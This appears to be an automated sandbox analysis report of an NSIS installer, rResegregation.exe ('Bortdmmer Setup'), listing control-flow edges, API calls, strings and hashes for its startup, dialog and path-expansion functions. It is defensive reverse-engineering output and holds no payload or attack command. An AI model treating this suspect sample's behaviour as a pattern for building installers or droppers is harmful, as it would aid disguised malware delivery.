4065->4036 4066->4065 4068 405bdb 4067->4068 4070 405be8 4067->4070 4087 405a55 lstrcpyA 4068->4087 4070->4036 4072 40573f 4071->4072 4073 406026 FindClose 4071->4073 4072->4004 4072->4015 4073->4072 4075 405749 4074->4075 4076 405798 lstrcatA 4074->4076 4075->4020 4076->4075 4077->4041 4079 405842 4078->4079 4080 405832 4078->4080 4082 4057a9 CharNextA 4079->4082 4083 405862 4079->4083 4080->4079 4081 40583d CharNextA 4080->4081 4081->4083 4082->4079 4083->4044 4083->4045 4085 405572 4084->4085 4086 40596c SetFileAttributesA 4084->4086 4085->4062 4085->4063 4085->4065 4086->4085 4088 405aa3 GetShortPathNameA 4087->4088 4089 405a7d 4087->4089 4091 405bc2 4088->4091 4092 405ab8 4088->4092 4114 40597f GetFileAttributesA CreateFileA 4089->4114 4091->4070 4092->4091 4094 405ac0 wsprintfA 4092->4094 4093 405a87 CloseHandle GetShortPathNameA 4093->4091 4095 405a9b 4093->4095 4096 405d2e 18 API calls 4094->4096 4095->4088 4095->4091 4097 405ae8 4096->4097 4115 40597f GetFileAttributesA CreateFileA 4097->4115 4099 405af5 4099->4091 4100 405b04 GetFileSize GlobalAlloc 4099->4100 4101 405b26 4100->4101 4102 405bbb CloseHandle 4100->4102 4103 4059f7 ReadFile 4101->4103 4102->4091 4104 405b2e 4103->4104 4104->4102 4116 4058e4 lstrlenA 4104->4116 4107 405b45 lstrcpyA 4110 405b67 4107->4110 4108 405b59 4109 4058e4 4 API calls 4108->4109 4109->4110 4111 405b9e SetFilePointer 4110->4111 4112 405a26 WriteFile 4111->4112 4113 405bb4 GlobalFree 4112->4113 4113->4102 4114->4093 4115->4099 4117 405925 lstrlenA 4116->4117 4118 4058fe lstrcmpiA 4117->4118 4119 40592d 4117->4119 4118->4119 4120 40591c CharNextA 4118->4120 4119->4107 4119->4108 4120->4117 5240 4028aa SendMessageA 5241 4028c4 InvalidateRect 5240->5241 5242 4028cf 5240->5242 5241->5242 5243 40432f 5244 40435b 5243->5244 5245 40436c 5243->5245 5304 4054e6 GetDlgItemTextA 5244->5304 5247 404378 GetDlgItem 5245->5247 5248 4043d7 5245->5248 5251 40438c 5247->5251 5249 4044bb 5248->5249 5258 405d2e 18 API calls 5248->5258 5302 404665 5248->5302 5249->5302 5306 4054e6 GetDlgItemTextA 5249->5306 5250 404366 5252 405f77 5 API calls 5250->5252 5253 4043a0 SetWindowTextA 5251->5253 5256 405817 4 API calls 5251->5256 5252->5245 5257 403ef1 19 API calls 5253->5257 5255 403f58 8 API calls 5260 404679 5255->5260 5261 404396 5256->5261 5262 4043bc 5257->5262 5263 40444b SHBrowseForFolderA 5258->5263 5259 4044eb 5264 40586c 18 API calls 5259->5264 5261->5253 5268 40577e 3 API calls 5261->5268 5265 403ef1 19 API calls 5262->5265 5263->5249 5266 404463 CoTaskMemFree 5263->5266 5267 4044f1 5264->5267 5269 4043ca 5265->5269 5270 40577e 3 API calls 5266->5270 5307 405d0c lstrcpynA 5267->5307 5268->5253 5305 403f26 SendMessageA 5269->5305 5272 404470 5270->5272 5275 4044a7 SetDlgItemTextA 5272->5275 5279 405d2e 18 API calls 5272->5279 5274 4043d0 5277 4060a5 5 API calls 5274->5277 5275->5249 5276 404508 5278 4060a5 5 API calls 5276->5278 5277->5248 5285 40450f 5278->5285 5281 40448f lstrcmpiA 5279->5281 5280 40454b 5308 405d0c lstrcpynA 5280->5308 5281->5275 5282 4044a0 lstrcatA 5281->5282 5282->5275 5284 404552 5286 405817 4 API calls 5284->5286 5285->5280 5290 4057c5 2 API calls 5285->5290 5291 4045a3 5285->5291 5287 404558 GetDiskFreeSpaceA 5286->5287 5289 40457c MulDiv 5287->5289 5287->5291 5289->5291 5290->5285 5292 404614 5291->5292 5294 4047ab 21 API calls 5291->5294 5293 404637 5292->5293 5295 40140b 2 API calls 5292->5295 5309 403f13 KiUserCallbackDispatcher 5293->5309 5296 404601 5294->5296 5295->5293 5298 404616 SetDlgItemTextA 5296->5298 5299 404606 5296->5299 5298->5292 5301 4046e6 21 API calls 5299->5301 5300 404653 5300->5302 5310 4042c4 5300->5310 5301->5292 5302->5255 5304->5250 5305->5274 5306->5259 5307->5276 5308->5284 5309->5300 5311 4042d2 5310->5311 5312 4042d7 SendMessageA 5310->5312 5311->5312 5312->5302 4609 4015b3 4610 402a3a 18 API calls 4609->4610 4611 4015ba 4610->4611 4612 405817 4 API calls 4611->4612 4624 4015c2 4612->4624 4613 40161c 4615 401621 4613->4615 4616 40164a 4613->4616 4614 4057a9 CharNextA 4614->4624 4617 401423 25 API calls 4615->4617 4618 401423 25 API calls 4616->4618 4619 401628 4617->4619 4625 401642 4618->4625 4628 405d0c lstrcpynA 4619->4628 4621 405468 2 API calls 4621->4624 4622 405485 5 API calls 4622->4624 4623 401633 SetCurrentDirectoryA 4623->4625 4624->4613 4624->4614 4624->4621 4624->4622 4626 401604 GetFileAttributesA 4624->4626 4627 4053eb 4 API calls 4624->4627 4626->4624 4627->4624 4628->4623 5313 4016b3 5314 402a3a 18 API calls 5313->5314 5315 4016b9 GetFullPathNameA 5314->5315 5316 4016d0 5315->5316 5317 4016f1 5315->5317 5316->5317 5320 406010 2 API calls 5316->5320 5318 401705 GetShortPathNameA 5317->5318 5319 4028cf 5317->5319 5318->5319 5321 4016e1 5320->5321 5321->5317 5323 405d0c lstrcpynA 5321->5323 5323->5317 5324 4014b7 5325 4014bd 5324->5325 5326 401389 2 API calls 5325->5326 5327 4014c5 5326->5327 5328 401d38 GetDC GetDeviceCaps 5329 402a1d 18 API calls 5328->5329 5330 401d56 MulDiv ReleaseDC 5329->5330 5331 402a1d 18 API calls 5330->5331 5332 401d75 5331->5332 5333 405d2e 18 API calls 5332->5333 5334 401dae CreateFontIndirectA 5333->5334 5335 402513 5334->5335 5336 40403a 5337 404050 5336->5337 5342 40415c 5336->5342 5340 403ef1 19 API calls 5337->5340 5338 4041cb 5339 40429f 5338->5339 5341 4041d5 GetDlgItem 5338->5341 5347 403f58 8 API calls 5339->5347 5343 4040a6 5340->5343 5344 4041eb 5341->5344 5345 40425d 5341->5345 5342->5338 5342->5339 5346 4041a0 GetDlgItem SendMessageA 5342->5346 5348 403ef1 19 API calls 5343->5348 5344->5345 5352 404211 6 API calls 5344->5352 5345->5339 5349 40426f 5345->5349 5367 403f13 KiUserCallbackDispatcher 5346->5367 5357 40429a 5347->5357 5351 4040b3 CheckDlgButton 5348->5351 5353 404275 SendMessageA 5349->5353 5354 404286 5349->5354 5365 403f13 KiUserCallbackDispatcher 5351->5365 5352->5345 5353->5354 5354->5357 5358 40428c SendMessageA 5354->5358 5355 4041c6 5359 4042c4 SendMessageA 5355->5359 5358->5357 5359->5338 5360 4040d1 GetDlgItem 5366 403f26 SendMessageA 5360->5366 5362 4040e7 SendMessageA 5363 404105 GetSysColor 5362->5363 5364 40410e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5362->5364 5363->5364 5364->5357 5365->5360 5366->5362 5367->5355 4726 40173e 4727 402a3a 18 API calls 4726->4727 4728 401745 4727->4728 4729 4059ae 2 API calls 4728->4729 4730 40174c 4729->4730 4731 4059ae 2 API calls 4730->4731 4731->4730 5368 401ebe 5369 402a3a 18 API calls 5368->5369 5370 401ec5 5369->5370 5371 406010 2 API calls 5370->5371 5372 401ecb 5371->5372 5374 401edd 5372->5374 5375 405c6a wsprintfA 5372->5375 5375->5374 5376 40193f 5377 402a3a 18 API calls 5376->5377 5378 401946 lstrlenA 5377->5378 5379 402513 5378->5379

                                                                  Executed Functions

                                                                  Function 004030EC Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4030ec-403121 SetErrorMode GetVersion 1 403123-40312b call 4060a5 0->1 2 403134 0->2 1->2 7 40312d 1->7 4 403139-40314c call 406037 lstrlenA 2->4 9 40314e-4031c1 call 4060a5 * 2 #17 OleInitialize SHGetFileInfoA call 405d0c GetCommandLineA call 405d0c GetModuleHandleA 4->9 7->2 18 4031c3-4031c8 9->18 19 4031cd-4031e2 call 4057a9 CharNextA 9->19 18->19 22 4032a7-4032ab 19->22 23 4032b1 22->23 24 4031e7-4031ea 22->24 27 4032c4-4032de GetTempPathA call 4030bb 23->27 25 4031f2-4031fa 24->25 26 4031ec-4031f0 24->26 29 403202-403205 25->29 30 4031fc-4031fd 25->30 26->25 26->26 36 4032e0-4032fe GetWindowsDirectoryA lstrcatA call 4030bb 27->36 37 403336-403350 DeleteFileA call 402c66 27->37 31 403297-4032a4 call 4057a9 29->31 32 40320b-40320f 29->32 30->29 31->22 51 4032a6 31->51 34 403211-403217 32->34 35 403227-403254 32->35 39 403219-40321b 34->39 40 40321d 34->40 41 403256-40325c 35->41 42 403267-403295 35->42 36->37 53 403300-403330 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 36->53 54 4033e4-4033f4 call 4035b2 OleUninitialize 37->54 55 403356-40335c 37->55 39->35 39->40 40->35 46 403262 41->46 47 40325e-403260 41->47 42->31 49 4032b3-4032bf call 405d0c 42->49 46->42 47->42 47->46 49->27 51->22 53->37 53->54 65 403518-40351e 54->65 66 4033fa-40340a call 405502 ExitProcess 54->66 58 4033d4-4033db call 40368c 55->58 59 40335e-403369 call 4057a9 55->59 67 4033e0 58->67 68 40336b-403394 59->68 69 40339f-4033a9 59->69 71 403520-403539 GetCurrentProcess OpenProcessToken 65->71 72 40359a-4035a2 65->72 67->54 73 403396-403398 68->73 76 403410-403424 call 405485 lstrcatA 69->76 77 4033ab-4033b8 call 40586c 69->77 79 40356b-403579 call 4060a5 71->79 80 40353b-403565 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035a4 72->74 75 4035a8-4035ac ExitProcess 72->75 73->69 81 40339a-40339d 73->81 74->75 89 403431-40344b lstrcatA lstrcmpiA 76->89 90 403426-40342c lstrcatA 76->90 77->54 88 4033ba-4033d0 call 405d0c * 2 77->88 91 403587-403591 ExitWindowsEx 79->91 92 40357b-403585 79->92 80->79 81->69 81->73 88->58 89->54 95 40344d-403450 89->95 90->89 91->72 93 403593-403595 call 40140b 91->93 92->91 92->93 93->72 98 403452-403457 call 4053eb 95->98 99 403459 call 405468 95->99 104 40345e-40346b SetCurrentDirectoryA 98->104 99->104 107 403478-4034a0 call 405d0c 104->107 108 40346d-403473 call 405d0c 104->108 112 4034a6-4034c2 call 405d2e DeleteFileA 107->112 108->107 115 403503-40350a 112->115 116 4034c4-4034d4 CopyFileA 112->116 115->112 117 40350c-403513 call 405bc7 115->117 116->115 118 4034d6-4034f6 call 405bc7 call 405d2e call 40549d 116->118 117->54 118->115 127 4034f8-4034ff CloseHandle 118->127 127->115
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 00403111
                                                                  • GetVersion.KERNEL32 ref: 00403117
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                  • OleInitialize.OLE32(00000000), ref: 00403169
                                                                  • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                  • GetCommandLineA.KERNEL32(Bortdmmer Setup,NSIS Error), ref: 0040319A
                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\rResegregation.exe",00000000), ref: 004031AD
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\rResegregation.exe",00000020), ref: 004031D8
                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032E6
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F2
                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403306
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330E
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040331F
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403327
                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040333B
                                                                    • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                    • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                  • OleUninitialize.OLE32(?), ref: 004033E9
                                                                  • ExitProcess.KERNEL32 ref: 0040340A
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                  • ExitProcess.KERNEL32 ref: 004035AC
                                                                    • Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                  • String ID: "$"C:\Users\user\Desktop\rResegregation.exe"$.tmp$1033$Bortdmmer Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre$C:\Users\user\Desktop$C:\Users\user\Desktop\rResegregation.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KIv$~nsu
                                                                  • API String ID: 3329125770-3388394840
                                                                  • Opcode ID: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
                                                                  • Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
                                                                  • Opcode Fuzzy Hash: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
                                                                  • Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405063 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 128 405063-40507f 129 405085-40514c GetDlgItem * 3 call 403f26 call 4047c3 GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 40520e-405214 128->130 152 40516a-40516d 129->152 153 40514e-405168 SendMessageA * 2 129->153 132 405216-405238 GetDlgItem CreateThread CloseHandle 130->132 133 40523e-40524a 130->133 132->133 135 40526c-405272 133->135 136 40524c-405252 133->136 137 405274-40527a 135->137 138 4052c7-4052ca 135->138 140 405254-405267 ShowWindow * 2 call 403f26 136->140 141 40528d-405294 call 403f58 136->141 142 4052a0-4052b0 ShowWindow 137->142 143 40527c-405288 call 403eca 137->143 138->141 146 4052cc-4052d2 138->146 140->135 149 405299-40529d 141->149 150 4052c0-4052c2 call 403eca 142->150 151 4052b2-4052bb call 404f25 142->151 143->141 146->141 154 4052d4-4052e7 SendMessageA 146->154 150->138 151->150 157 40517d-405194 call 403ef1 152->157 158 40516f-40517b SendMessageA 152->158 153->152 159 4053e4-4053e6 154->159 160 4052ed-405319 CreatePopupMenu call 405d2e AppendMenuA 154->160 167 405196-4051aa ShowWindow 157->167 168 4051ca-4051eb GetDlgItem SendMessageA 157->168 158->157 159->149 165 40531b-40532b GetWindowRect 160->165 166 40532e-405344 TrackPopupMenu 160->166 165->166 166->159 169 40534a-405364 166->169 170 4051b9 167->170 171 4051ac-4051b7 ShowWindow 167->171 168->159 172 4051f1-405209 SendMessageA * 2 168->172 173 405369-405384 SendMessageA 169->173 174 4051bf-4051c5 call 403f26 170->174 171->174 172->159 173->173 175 405386-4053a6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 4053a8-4053c8 SendMessageA 175->177 177->177 178 4053ca-4053de GlobalUnlock SetClipboardData CloseClipboard 177->178 178->159
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                  • GetClientRect.USER32(?,?), ref: 0040510E
                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                  • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                    • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405238
                                                                  • ShowWindow.USER32(00000000), ref: 0040525B
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                  • ShowWindow.USER32(00000008), ref: 004052A8
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                  • CreatePopupMenu.USER32 ref: 004052ED
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                  • OpenClipboard.USER32(00000000), ref: 00405387
                                                                  • EmptyClipboard.USER32 ref: 0040538D
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                  • CloseClipboard.USER32 ref: 004053DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: @y
                                                                  • API String ID: 590372296-2793234042
                                                                  • Opcode ID: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
                                                                  • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                  • Opcode Fuzzy Hash: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
                                                                  • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405D2E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 423 405d2e-405d39 424 405d3b-405d4a 423->424 425 405d4c-405d61 423->425 424->425 426 405f54-405f58 425->426 427 405d67-405d72 425->427 428 405d84-405d8e 426->428 429 405f5e-405f68 426->429 427->426 430 405d78-405d7f 427->430 428->429 433 405d94-405d9b 428->433 431 405f73-405f74 429->431 432 405f6a-405f6e call 405d0c 429->432 430->426 432->431 435 405da1-405dd6 433->435 436 405f47 433->436 437 405ef1-405ef4 435->437 438 405ddc-405de7 GetVersion 435->438 439 405f51-405f53 436->439 440 405f49-405f4f 436->440 441 405f24-405f27 437->441 442 405ef6-405ef9 437->442 443 405e01 438->443 444 405de9-405ded 438->444 439->426 440->426 449 405f35-405f45 lstrlenA 441->449 450 405f29-405f30 call 405d2e 441->450 446 405f09-405f15 call 405d0c 442->446 447 405efb-405f07 call 405c6a 442->447 448 405e08-405e0f 443->448 444->443 445 405def-405df3 444->445 445->443 451 405df5-405df9 445->451 461 405f1a-405f20 446->461 447->461 453 405e11-405e13 448->453 454 405e14-405e16 448->454 449->426 450->449 451->443 457 405dfb-405dff 451->457 453->454 459 405e18-405e3b call 405bf3 454->459 460 405e4f-405e52 454->460 457->448 472 405e41-405e4a call 405d2e 459->472 473 405ed8-405edc 459->473 464 405e62-405e65 460->464 465 405e54-405e60 GetSystemDirectoryA 460->465 461->449 463 405f22 461->463 469 405ee9-405eef call 405f77 463->469 466 405e67-405e75 GetWindowsDirectoryA 464->466 467 405ecf-405ed1 464->467 470 405ed3-405ed6 465->470 466->467 467->470 471 405e77-405e81 467->471 469->449 470->469 470->473 475 405e83-405e86 471->475 476 405e9b-405eb1 SHGetSpecialFolderLocation 471->476 472->470 473->469 478 405ede-405ee4 lstrcatA 473->478 475->476 480 405e88-405e8f 475->480 481 405eb3-405eca SHGetPathFromIDListA CoTaskMemFree 476->481 482 405ecc 476->482 478->469 484 405e97-405e99 480->484 481->470 481->482 482->467 484->470 484->476
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000), ref: 00405DDF
                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
                                                                  • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
                                                                  • CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                  • lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000), ref: 00405F36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-3776482974
                                                                  • Opcode ID: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
                                                                  • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                  • Opcode Fuzzy Hash: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
                                                                  • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

